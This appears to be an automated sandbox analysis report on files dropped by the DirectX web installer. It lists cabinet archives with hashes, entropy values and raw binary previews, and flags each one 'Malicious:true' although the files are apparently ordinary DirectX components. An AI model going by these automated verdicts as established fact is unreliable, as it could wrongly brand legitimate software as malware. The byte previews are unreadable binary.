                                                                                              Preview:MSCF............D................................#..................! ........<5p. .xact2_4_x86.cat..;..! ....<5n. .x3daudio1_1.dll.....9[....<5.. .xactengine2_4.dll.W...Q.....<5.. .oct2006_xact_x86.inf...........<5.. .xact2_4_x86.inf....)l:..CK.|.\.........." .DE...N..!.*.....A.\....."*.x>...Q\<V.X.k.Q.W].u3bDWWQP.Bt.|.......~.....?'.twuUuuuUu..-^..=d~...z....".>.t...W...b..Q...^D...=T.B....PJ..5.:...t4@..Bg..j.{zR..]-O.'.....]pwG7G.......wA.".....bI.s.../..?g..nw....t.F..#.\......9...A........N...x...q.......R..p|<n.......$.!.T,....0.&.{...V]4@7.w...r..<..@[.w.z."..S?..J.F.a.c.. ...F. q.1{..Ov..`\..I./.B.../.N ./....~s.T*h.2....`...(.)B@}.!.........?.Z...r.9.;...n....D|_.p.,4.. ...........$|....b...Q.....r4.&N..w.,.O......$z.....F... ......A.....H2$#N......D.u%...%?...>._...DY.m..O.k.7Y....1..".......,h.......,l,..;.JgS0.....p.n....%......H.k.Hv.46.t.?.R8....x....F..Lq.... ..:...y......K..k..[..;...^[!.....F.P...}V5...}_7...q..z.b#...PFFEZ$].:.k......-

                                                                                              C:\Windows\msdownld.tmp\AS4681BE.tmp\Oct2006_xact_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 176401 bytes, 6 files, at 0x44 +A "xact2_4_x64.cat" +A "x3daudio1_1.dll", flags 0x4, ID 8466, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):185569
                                                                                              Entropy (8bit):7.996440771278114
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:m3ZITAOIgaJqZazyaNuGKQb5aML7XTXM9+37VD5d58Oxz+oKG+ONa8bW9uMBowLB:iImMo2aHb0MvDn3jdhzWONFob
                                                                                              MD5:CC568D26B5B4CDA021D528CF75B21699
                                                                                              SHA1:DD47A33950C9E3A88DEFCAA7EA331FB1F1BBAB97
                                                                                              SHA-256:662D4E5D005CDBA02FABB0D7A68A7B48ECAFDEBE21718D892833D5C482E5ADD7
                                                                                              SHA-512:24B53BBD82DEC594D9909352D1F2AFE69B6F082DB99AAB3385826C4E8D22F5C075F3C5A24C8104DBEEF2D894980319AF141C65D768A51936C75092A846F3C8AA
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................!...............#..................! ........<5o. .xact2_4_x64.cat..E..! ....<5o. .x3daudio1_1.dll.....9e....<5.. .xactengine2_4.dll.....Q.....<5.. .infinst.exe.....i.....<5.. .oct2006_xact_x64.inf...........<5.. .xact2_4_x64.inf...~.x:..[.....0...R.P...O....5H"... .I.XA.D..MtT....A..MJ....$."=P).y.IB.EJ..".`4..f.{..n..Z.....|w..5@.!&. ..Gm..D..M.@.<[....9gea..8e..C.b_....... .....D".f.@......gP|..B...2......{.........'.3H..K.RU...B....{.......).....m.I@ ...Q]....(.'$..'...._4....J^.._......R)0i(b......_./.....80.@..H.H......?..%N.F.<.>...".gt.P..........'.....7R.@.....6.....P.V...X.od..$....Oy.......} "o.}...HWza..../.%..d..o.F..q...D+...)..."..C... .2.8..f....<..=N...c.Z4[v'.......f...i,.....P...s7...K'...:..A..bW.......S%v.##3...c..Q..+.$kQ..2.....,..=^../'.._!.D.......$.T.n..Z..'.@.2....O...:Y'...@...?./......"Ti2}...N..=.kq...x.T.?.Tq.?..?IB....N.x..=.CTl........V9y.sCay............D.Q.'.?.8..8.....<A......).$'..g

                                                                                              C:\Windows\msdownld.tmp\AS46876B.tmp\Dec2006_d3dx9_32_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1565194 bytes, 5 files, at 0x44 +A "d3dx9_32_x64.cat" +A "d3dx9_32.dll", flags 0x4, ID 6631, number 1, extra bytes 20 in head, 137 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1574362
                                                                                              Entropy (8bit):7.999757508861621
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:AbmMc7lXv7PY1QKs16rjZ1w00Z2xgaJgYRf4MyHGktr3+mlQmxHw8gEeGrs+RDb1:Km7lXk1Zs1Mj0SgyqP3RvxQX7G3H1
                                                                                              MD5:2290064562F2D6D197765F4EDEBC5BF0
                                                                                              SHA1:70C2E3C3EB521BA4C46C428D57166631F86512C8
                                                                                              SHA-256:DA1CE01BE39F41F967282849715E8310DC1887BFEB92C4E0166D2C31F00647F7
                                                                                              SHA-512:B25A517DE79668E3ABD88ACDE835DF4A0D69E70CE0E001DB31D5DEBCD812BCE46F4ADA5E07C036C7BBE88D6DFC9F6531B2198F03FC27FA46070C790B45955DEC
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#.............................5.a .d3dx9_32_x64.cat...C.......}5.h .d3dx9_32.dll......<C....5T_ .infinst.exe.....'CD....5.` .d3dx9_32_x64.inf.&....ED....5.` .dec2006_d3dx9_32_x64.inf... .....[...J .*.M.P..%A.P...?..O..V..=Z!R._...DQ..E..ha.;.CZ.D.....u8h..A....."3DW4.......o........I...-.[...L..X...ns.xm..M...os.$.cu=.k...Y.=M<.m.'..y.5...k..K.....7.k.B.$.p!E ......bf....n1...4..........T...{.7..........]&.{l7.g..6-.M.k.-3.j]6......m.......<.M..... ...ibM.@..=.....1....@....!4..A..bIxR.3..=.|@i../....f..R NO..7.N..+....SJ..b5)......(.S..5U..6...hG..b..7.....Ye..yu....^`.+.A...x.wn..NI.......>Ld..+|.ij&.4o..2Q.r.$.....}&l...d...|K......_.+.aSP.>...6@A...)\..kL...R.....F.b$~.."...e.):n......^..7..:.3$h~G.EA.A:..8).i......U....L..*PU.....s..$...v.-.:.u..:.DM...Y.......].x...<.z...`y.K...)d.{`......:.c......w.k....?.wU@...r....~.T....j.wg......K./...&,...?......:g....bZ.K#..^<..?...}.q.r....9.;.2..Mh<

                                                                                              C:\Windows\msdownld.tmp\AS46911F.tmp\Dec2006_xact_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 139639 bytes, 5 files, at 0x44 +A "xact2_5_x86.cat" +A "x3daudio1_1.dll", flags 0x4, ID 7324, number 1, extra bytes 20 in head, 9 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):148831
                                                                                              Entropy (8bit):7.993942345904899
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:kF/u2w4VarOr9vE3eKgpEUcXDlkCAMsukGtnJW+ATOcfKy:kF/JWg9vE3eKzXDeMpNnUOcfKy
                                                                                              MD5:082B7D69F96799AA2AB1A8EA1FA2AB88
                                                                                              SHA1:75C7032B749259977C947A5103F9A4B92C2025DE
                                                                                              SHA-256:B98E55C654B9EE6F6D040665D932BEA7A1299C56CC9996EEA900AC4F5649C7D3
                                                                                              SHA-512:57C96A4C99AB9A7D33A8CC81A3B4E2AB58FE3A2FBC7F79AD688C7D0257D281C662D4CE0737F68C00D15F715BC6177D2FF9CC32A69CFB77216265FA56FF79DD8A
                                                                                              Malicious:true
                                                                                              Preview:MSCF....w!......D...........................w!...#..................! .........5.a .xact2_5_x86.cat..;..! ....o5.\ .x3daudio1_1.dll.....9[.....5@` .xactengine2_5.dll.W...Q2.....5.` .dec2006_xact_x86.inf......8.....5.` .xact2_5_x86.inf.@.u..;..CK.|.\S.........EY...E.......A..M..dk.P\.DT..V..Rq..R.*.(..V.[m........E....}...}.......{g..9g.9....x!.ZGo....o.)..B...........a8.....^H....C.S.].)e....U.,.}..E...a7..+.......xv.>..H......N.Sp#-t*.J...)...c0'....1w... ..9c8..8.~NP........O7(.b....%.u...T..-.....9*.;........H...~c 7.n>.A9.........W....#..@..p!.G.R1\....B.N.'..Z.c|0..(+.l...<._(6..cYX:&.$p.F?.VK.t.....[|,....q.b.....AS6...h.I.G....1 ...z.....J.j.~..-.H...@.z>.. M...{.".........o7...-....E..C..6..................`...... m)..ad.#.5...p.....j..j|..w...#.j]..BZ.......?oK...=_L.bDD..{.VK^...qe.../x.5.,h....1.".l,.x...N..)..N.A............%.H.k.Dv.4Kd......,..f...lB.QO6.N.(`..D..<W+......j....d....{o..t...e4*.Je.=.w.....773....q...Ha@.*..Q..I.1.N....4

                                                                                              C:\Windows\msdownld.tmp\AS4696FB.tmp\Dec2006_xact_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 186515 bytes, 6 files, at 0x44 +A "xact2_5_x64.cat" +A "x3daudio1_1.dll", flags 0x4, ID 8443, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):144891
                                                                                              Entropy (8bit):7.997618513042835
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:ZCISkfUHof5yPnSKfEGMKBQ0sncpIt1EXRN0F+jTx8bh44VhRjR+t2h5fjJfn2EL:ZNdUIRanSK8Gd0nKIAN0F+RWugXRa2bz
                                                                                              MD5:219ABD58672661EA814E3739729DDC04
                                                                                              SHA1:3CFB7D0AE07A9FDA3D77AC761BAC4243ACA961F0
                                                                                              SHA-256:56AEAE85E4E85FCD50D2733371C4977602B720EE72522FE24ED93605BE037C69
                                                                                              SHA-512:8B0EE032677EA0CEC388C017A3AF5FD404F2F26191203D372EF8E95B19F16E669473039C70287B58759422D6DCACD3A1D45A6F13D85952CF5DFD56EC63EADF02
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................ ...............#..................! .........5.a .xact2_5_x64.cat..E..! ....o5.\ .x3daudio1_1.dll.....9e.....5.` .xactengine2_5.dll.....QZ.....5T_ .infinst.exe.....ia.....5.` .dec2006_xact_x64.inf......d.....5.` .xact2_5_x64.inf....V.:..[.........A.P$..O.v..lM.!I.S.T..FJ%;..R.U..pj&...L..:.B. .W.I.... .3.43.`...W...kK..p......-].5....)R...V..vW...mu...]].M...al..5%:..vi,C .JH..81&..$..O!(..........D#`F.5......$.!..# F...4F.....4..E......Yx...>...6.b8..a..Bh.......`..`G2.9..0%.0y!..P8.M..L...j.-?d+...2.m..S..P2,`.cg...M.....M..^.....!.U..I.(..P.....<..p..@.......]..G..A&B.HD..(\.GM.......A..^!.B.W.U.L..r....A.".....t.0`@Zw.Fa...s....C.......Q...,.N...W.C.P........|...R.^@.....2..(..3.....N....z...wd\..O,...........~...J"GQO|...4... %.I.BU..>E+Y&r.HdA[.c..,.h.../F..k...>...$d....ko."T@os...N&..'.z...FJ.y..;. ......y...]..i`.@..O.........gk...NW.B...5-.....C........']~|..HR]....'.....|.n..).2..'.dT.G.....p......k.8!^...;.e

                                                                                              C:\Windows\msdownld.tmp\AS469D26.tmp\Feb2007_xact_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 142023 bytes, 5 files, at 0x44 +A "xact2_6_x86.cat" +A "x3daudio1_1.dll", flags 0x4, ID 7329, number 1, extra bytes 20 in head, 9 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):151191
                                                                                              Entropy (8bit):7.993972565562067
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:4uMWvVgAanBDv9WkUtrr/uZfQMyolbnXkFDwoY0ZwuY:BVgAutNUtrLuZfjjljgTY0JY
                                                                                              MD5:A09F7EAB35816D682E7432DBB36B047D
                                                                                              SHA1:DB67B9434ABAA8E7F166956A1C8D01F536162C21
                                                                                              SHA-256:0E3655490667DDF17150AEC089889268BDD7F1E8367D2BED6F3EB68A5FF28288
                                                                                              SHA-512:FB1CDBFB3CDD60783D1C8696EA6EFB746331880C79AA74052808CA09092CF1A2336BF784104D16203740998129B718DC0AD4A632E4031E85CCF340C593F05E57
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....*......D............................*...#...................)........86u| .xact2_6_x86.cat..;...)....(6.{ .x3daudio1_1.dll.h....d....86o{ .xactengine2_6.dll.W...&L....86.{ .feb2007_xact_x86.inf.....}R....86.{ .xact2_6_x86.inf.;{..w?..CK.wXSI..o..HQY....r..!. .....TV..0..$tTB.....(..((J......(.R.qm.E.d.... ......~...y..93..3gf~.!..Y...^..&.7q. .... .J..`.QPX..-....0... .-.C.b."0N...R.b."..b0.r..U..V.....1..ql.8..1X}.....o.%.t.."B...2...,..@...x..p..0.........AZ.D., ........x.,..C...0.k....aH.........U.V.V.....0....P...6..PeN.........../.-.^.x..z}....q........$h08..3.I,..r.........4......!...oh...x.&.C@....p(J0M....d.5......,..XHC....jf.....A.=(..P.CF..}...[..>...?.9$...K....ofa.......5.p.....g.`T.v.{Ks...."2.N..3.2.<.....x...m.y.B...=....k..|%B....!.y...kq..7..{.....j.W).,.>..>.......@..9.A...2..,.8.t`-d+.z....`.....0....6.......{.....X.0q....98.@V.....C 3v..o.x`.#..r.".`V...s.....?G6.#..2.pb.......$.....@...b.n..&....W.._..CB..c..%...HQ.U

                                                                                              C:\Windows\msdownld.tmp\AS46A2D3.tmp\Feb2007_xact_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 188715 bytes, 6 files, at 0x44 +A "xact2_6_x64.cat" +A "x3daudio1_1.dll", flags 0x4, ID 8448, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):197883
                                                                                              Entropy (8bit):7.995921670109717
                                                                                              Encrypted:true
                                                                                              SSDEEP:6144:aX7CLQxFiIUEWXDCsi3jGg+U2p2z51zHdZ5a:78iE1sx0s
                                                                                              MD5:CC622A75240CA96FA8F28BD984BED5BC
                                                                                              SHA1:424F216C5C0E02AE654612EAEB04900C9DAFBC61
                                                                                              SHA-256:3454D5101716A5C17BCDEE8632668D981F99E8558D8D05E20A33ED718ED8C2AC
                                                                                              SHA-512:EAB36CD6BC3AE6F67D89996785F9C7D51E140BFB839A866B4E4FFA7809846DF861D30D1FCE2E1A498E8403DECA5CCBC50B8F37F4C1B4AD3CD3A63B150C49ECEF
                                                                                              Malicious:true
                                                                                              Preview:MSCF....+.......D................!..........+....#...................)........86v| .xact2_6_x64.cat..E...)....(6.{ .x3daudio1_1.dll.h....n....86w{ .xactengine2_6.dll.h...&p....869{ .infinst.exe...........86.{ .feb2007_xact_x64.inf...........86.{ .xact2_6_x64.inf.{4&.Z=..[.....0...R.P...>..s*.N{.....9..J<.....AZ.Q.PQT9'..E.I....R..(.T$..........w?.Z....Q.b......!-...&..2Un ...TCY.t(.07#..I. ..... 8...".7.... P.....F......-q..Y+."-/....}W.].......l2..]T.H@o..t..^..@1..Yd.2f.@d..?%....B.H.r.P....l$..d.3w....J...%^..!.Q..q...$...C."...t....LO....=...E..'.Pw@!...>...`...v..|Z>.?Sv~.Eb=........R.../.....A....h.....Q|.w.e.e;..h..7.P......}.?R]... ...=.."`...F.t}>0...>.../`!...>..8......W.+.a....!@.`d.....p.b.!}..4..ma%..<..+8.%X.....u....v...C.;iW...0.}"....h...|*/r......c_...Y.p.F(G..N......o..#....P........).(........+.;...O...iOK.,.........A.x.k.....~..l....@.$z.D....C=b....S..}.+....7... .~...n..%XM...c_.'..B........\.....0..?.7...m7~......n@..Q...Y......._.f

                                                                                              C:\Windows\msdownld.tmp\AS46A89F.tmp\Apr2007_d3dx9_33_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1601398 bytes, 6 files, at 0x44 +A "d3dx9_33_x64.cat" +A "d3dx9_33.dll", flags 0x4, ID 8295, number 1, extra bytes 20 in head, 140 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1610566
                                                                                              Entropy (8bit):7.999804070832858
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:NjzSeifTXjfzuO/m35sCqSrSBEZqyi2bjbBfQbIKpP5FfiB0Qjq/X1ZXp8e:NvSeSTXj7u0OUM9UStQbNd/Gjq/FD
                                                                                              MD5:F33C12F535DC4121E07938629BC6F5B2
                                                                                              SHA1:6B93FBE3D419670A71813E087D289B77E58E482B
                                                                                              SHA-256:3CA2ACF6B952D6438B91E540F39ABCB93EE12E340BA1302F7406F01568E5CF91
                                                                                              SHA-512:DF1753AB43D5B7FDE2A5EB65A77B37BA28599BC0683A4306F101C75F82B0F1A2C8DDF5741981073CC5DF26E9EA38C9A495ED0FB1689D2E7FC7D6F693759C822A
                                                                                              Malicious:true
                                                                                              Preview:MSCF....vo......D...............g ..........vo...#...................(.........6{. .d3dx9_33_x64.cat.h.D..(....l6O. .d3dx9_33.dll.h.....D....6.. .infinst.exe.,...h.E....6C. .apr2007_d3dx9_33_x64.inf.......E....6B. .d3dx9_33_x64.inf...../.E....6B. .d3dx9_33_x64_xp.inf...'+....[...S g.uM....5!.f...O..v.f.......t.nn$$....d.].Up.$..*...Z2]T.B.FB-.5..I.c3CF3..g....^....=.7....ZF..J.j.c..q..R.....K.6VW..j.9j.+.....J.N.t|6....K..(......-4Fpq...of..@na......A...X.jg..5D...~...........T.....ymsv..f..'"m..k..?..d..=/M..\..3..!.%)....)....v.7l.%.$$.(!RR..@.e.. ........ EfP.h.H......^Q^C.c.u.....u..6......PD...I.\$.J=BX.7..d..H|...h.5zen.Y...KsJ.wk..m.{...KRJ.JJ0t..u/$.N..:..y<...).......)Tjg..GL.=.7.4wGV..|.B.4`.{.})?.#..O..0|.J.NN.9......|u.N_Xi2....$.'..,.......}.j'..... ......I..M...h...&W.$. ..9rs.;.])*...SER.SMDhBS..D.gTFD..0M...E.....D.o..:}du[....b..Y#..`...9.<.'G.:..Q...y'._..|....\1O.o).$..(.')$..`.'oB...jF.%...w....cQ....`.o...k<..[...T....o%

                                                                                              C:\Windows\msdownld.tmp\AS46B273.tmp\Apr2007_d3dx10_33_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 692652 bytes, 7 files, at 0x44 +A "d3dx10_33_x64.cat" +A "d3dcompiler_33.dll", flags 0x4, ID 10164, number 1, extra bytes 20 in head, 61 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):701820
                                                                                              Entropy (8bit):7.999560976493214
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:RK6/uIaEOb2fc+HdQn/lDTK79RrFEYnj3LUFWQJcR1WrADy2IYxUSsEtiqUoY:RUlb2fc+9Qn/u9RrFEO3LUjU95I/EtiL
                                                                                              MD5:906318E8C444DAAAEA30550D5024F235
                                                                                              SHA1:3F3DCCF0A8A1CBF6F603BE1DA02E1E2BF89D24FC
                                                                                              SHA-256:1A37565C5B868B6A5C67F3E24B8AF547506799444CB77C7086E7B0CEC852F239
                                                                                              SHA-512:0A7AED2F49EA3DCBCA1607FC46F166A44BC9D08589DB05051B422C8AD84ADF322352F71333367C612F9579B4AACB4CD6B82489DDF168AD67FB4D42AB52999C88
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................'...............#..........4...=....).........6.. .d3dx10_33_x64.cat.p]...)....l6O. .d3dcompiler_33.dll.h...2.....o6=. .d3dx10_33.dll.h....B.....6.. .infinst.exe.L....T.....6F. .apr2007_d3dx10_33_x64.inf.....NW.....6F. .d3dx10_33_x64.inf......Z.....6F. .d3dx10_33_x64_xp.inf.d7$....[.....@.....P...O...u..AA.?.nE.DW.$.3B..BU.H...!.W..".J.^.IJ$(....hD.......vo?.$ef . t.=.......p.H.P.D&..t@..\..sCb!1i..O...........w................l{......d...-....Q.\.......xCNH....+.%"..;..o..DD..r.4B."...H`.?.P&.....>"(...E..HT.Q....:..e9 .{.j%...e.....$.p..R.....;.%!..>.....G......*.....x.~.@.....H.K....P?.w.^....7.R.RW ../p..w, Y..bu W.r.h.T..$Q.....\z....V_.^..N0=....K~.>.$v.}...y7"!.w...s..@b....~\.ily........Y....l.`.^.?y...w.. ....]..)...R1....... ...#......G...J.F.0x1.6^S>.*/.x..p..............(.B..$.....r.....CO9.R.1..a.a..})..^.h...+.P..}-?Z..H..t....U..gO..M.].l.2..........*.d.N6G...I..=..L=O...........:.....*...... .......2.c.?'.<1..w......?..E

                                                                                              C:\Windows\msdownld.tmp\AS46B9B6.tmp\Apr2007_xact_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 145265 bytes, 6 files, at 0x44 +A "xact2_7_x86.cat" +A "x3daudio1_1.dll", flags 0x4, ID 9001, number 1, extra bytes 20 in head, 9 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):154433
                                                                                              Entropy (8bit):7.994491966822324
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:BcJ4S2kOBrMASnHr7M58QmpeFT7582Skd1ksaIwbhQDp9kkIFxYJQZW9379+:BQ4S2kOi/MKbSV82xKnDVQ/EqQZa3k
                                                                                              MD5:8922189C0A46D26B2C52C65515D87180
                                                                                              SHA1:27830C01AFB15158186A045B7224EF33793AD211
                                                                                              SHA-256:39F970BF4CC42E9325ADA84A603C6C691BF94921385A52325F402F7432ACE697
                                                                                              SHA-512:53D51CAA2CF448681A709F2B9737EF75DEA4E9A46E2B29E6588B13E941671643A64D3597649AA2AE0B1FE9E5D591ED00BAD9FF3344CA62851E03A68279142CAB
                                                                                              Malicious:true
                                                                                              Preview:MSCF....q7......D...............)#..........q7...#...................).........6.. .xact2_7_x86.cat..;...)....e6Ie .x3daudio1_1.dll.h....d.....6.. .xactengine2_7.dll.o...Bb.....6D. .apr2007_xact_x86.inf......h.....6D. .xact2_7_x86.inf.....:l.....6D. .xact2_7_x86_xp.inf..IL..9..CK..8.....Y.$K%;..93..E.R....cd.....lm.*..5!Zme..!.)e.}.$)....f...z....^]W.\.s.....~~.=....*n.E1.1.P<.t..3.)..B....7....Z...,l.7.*7..b..Q.,l.l....._..Q(.....n....ys..g....D@.Z..........Z1A..R......F.,:.[&"Z....E..rzH...1..)..#..L....p......C...6..z;4....dW"....]...&PR...^.p.0..U...[.a.@...9<.......F..@...h........a..As...g.FJ#.....@...d.BA......0..Xq.7o.-.....S9.....;_....L..x...3`......v..el........./....L9...K..=u^.-s..R...N.>84.~...=%..cG....Mh.....sd3xfG...JsN...6.'.....)./1...S..7....@mZ.....7...W..'..wY.US[Y...`..&'..9.~^.-h..a1.Y(.0?M.].NG.H..@..:......&4v&.Aa..N..~3Z..d.9.....H....x..`.s..L;..f.7jB@.Tc..}.....A%..Ej...&..!_d.i2q..3M........(`.?.c.(4Z..Av...4........?..B

                                                                                              C:\Windows\msdownld.tmp\AS46BF54.tmp\Apr2007_xact_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 189806 bytes, 7 files, at 0x44 +A "xact2_7_x64.cat" +A "x3daudio1_1.dll", flags 0x4, ID 10116, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):198974
                                                                                              Entropy (8bit):7.996718266567073
                                                                                              Encrypted:true
                                                                                              SSDEEP:6144:kr+0amjUgjJG0HRzMUxWDJkUMP9KeK17dq569:krPVzjf+pk9keKdq5q
                                                                                              MD5:FBB6AA140D5D0AA28A7561EA15D69E72
                                                                                              SHA1:26804276EDBB1EE23B96690B40A01BB9C723F7DA
                                                                                              SHA-256:7781F0494648989583D4AC7695B9C5310EEA76B6A102E15EA0FC7376250E4584
                                                                                              SHA-512:08D6F2EF3346229F71E9FD6904D99BCB69F0A03CBD2D428F0A3BA58836694B801446165814AEE120B4C5EB7046184B08FB49248F5E1941579B9CAEAF9FBA1B1A
                                                                                              Malicious:true
                                                                                              Preview:MSCF....n.......D................'..........n....#..........*........).........6.. .xact2_7_x64.cat..E...)....e6Ge .x3daudio1_1.dll.h'...n.....6. .xactengine2_7.dll.h...B......6.. .infinst.exe............6D. .apr2007_xact_x64.inf.....B......6D. .xact2_7_x64.inf.%...E......6D. .xact2_7_x64_xp.inf.t%...8..[......[..1.P$.._.ww.U..UD*:WB...R..%D.J.?III].o7I. .o..7...._..1..3. ......@.......{.tz......-n.....n(..j..Z...m...[.dgi/wb.q...Cl..M.8.jmh|....h&"P`B ..%...c>..... .....D4...P..fo..D.....0.@...m...!...mT.......ir..q+)..r...*...o".D(.@A.)+.(..3..(.G.}.L ..p.....aF..,)..$.cr.1...J..%..|.)..=.K.H..Ep.....K..^...m6.......P....N@..I.|.|.'....@a.. "....H.d...1....&.!D......{.X-..\.S;0NOe.3,&......a.S~..;wd...R.Zt.7...J~..n.'.......J.e..'H.........@.~....T@..........y......8(2....9.p:...^...y...$....X*..b...c.N.Dprnd).$..d.mIv.,G.D.#..A..].1..A.L$].7`...;...L.....B!.....:..EA..1.V..?J.7..7...T.Bz....]..%t.7.F..5G:......."H..O9.....sAk.q.}1U.'I........o.t...jr.`v..

                                                                                              C:\Windows\msdownld.tmp\AS46C53F.tmp\Jun2007_d3dx9_34_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1601814 bytes, 6 files, at 0x44 +A "d3dx9_34_x64.cat" +A "d3dx9_34.dll", flags 0x4, ID 8310, number 1, extra bytes 20 in head, 140 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1611006
                                                                                              Entropy (8bit):7.999795394912666
                                                                                              Encrypted:true
                                                                                              SSDEEP:49152:dyO6V3G0SAcId5iPNJKbtZJSlR3Q0872iOda:dyDlSA/5iPNY7Jo3GPOda
                                                                                              MD5:8DBAA3047397EE4CFCA2EFFFCC2DFBD1
                                                                                              SHA1:D88FAD72D7EAF38B8469B2B8492311C39C42BE04
                                                                                              SHA-256:FE4B15931E048C97CBBC26F753093E7D41ECCF174402542631284F8BDB9EE692
                                                                                              SHA-512:1CE01BF0BD4C0D832D95B13E958DA6CB69C0D3949B128FCF40EC59ECC0AD8989B27C91EAC28CD98777D57DFEB811CC1077FDB87348A11B6370D806771D7E742D
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....q......D...............v ...........q...#...................(.........6.. .d3dx9_34_x64.cat.h.D..(.....6.. .d3dx9_34.dll.h.....D....6.. .infinst.exe.....h.E....6.. .d3dx9_34_x64.inf.......E....6.. .d3dx9_34_x64_xp.inf.,.....E....6.. .jun2007_d3dx9_34_x64.inf.....D...[...S ..uM....5!.f...O.....c.F...7..FA,...Jtc.kn$..P..R..Z.$.J.U#!.TJR)..1.!..@C3.........=.G..{#t.,..7V.uh..8..R...9I-d.X...W.vr..V+}NjE...S...pq.l...)V..,Q6..x.Hb.>9XoA.R.=..v......`.4.3...[f)...`.../........Q..........m...{.y2.u.....m.....}2.r.nF.......c0 ...KI.&sD..YD.2.`0...&....x..~......<$bS.l...C..B...~_...~s....V....)+H..!.....G.p..1...Rn<...=.$.SY.W...=..s..{.7%-.qUs.2..IZI)_(I^.%.....0.w8..~.8.....B..b...Sh...=y3....(I]...L....iF<..{oD.......%...8..S.^.$.E..f..P.....d...l..$...O...G.G&............)I..........I.&...8&....wd.RL..B'..*..phbG..B...ED..0..8....M....N..$..*%-..u.k.KS4...Gd.Z..r...SRJI.V........&?4./)..I.|B.I.I....A...I....1..;.+...9.}.?..c...u.3.].T.~j..$1v./_

                                                                                              C:\Windows\msdownld.tmp\AS46CF03.tmp\Jun2007_d3dx10_34_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 693084 bytes, 7 files, at 0x44 +A "d3dx10_34_x64.cat" +A "d3dcompiler_34.dll", flags 0x4, ID 10180, number 1, extra bytes 20 in head, 61 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):702252
                                                                                              Entropy (8bit):7.999542751209748
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:8B7y3n2GQi70ZEqAEToKVkDYK96luRC/Qwrkxb0b9fhXNkVkN2t3r1:8BO/j0ZWET/isK96luRC/jk49JN2t71
                                                                                              MD5:1AB35D11274D1ADBD316B19C44B9AE41
                                                                                              SHA1:14165EC367CE179588C8A5806FC968FDB49B4ACA
                                                                                              SHA-256:02ED1B5A850EDB52EC174DE177E91842EDC7C5F4C06CEDA5B16F3427DBCD4C99
                                                                                              SHA-512:71C8FAC7C95211D323C4FB6A02916E7D43EE399BBE0F1D983B5AC210F5039B23355F40B36F023F3C36E19787E2871A60CC389E51D6327652CD84D9E3B93D5A4D
                                                                                              Malicious:true
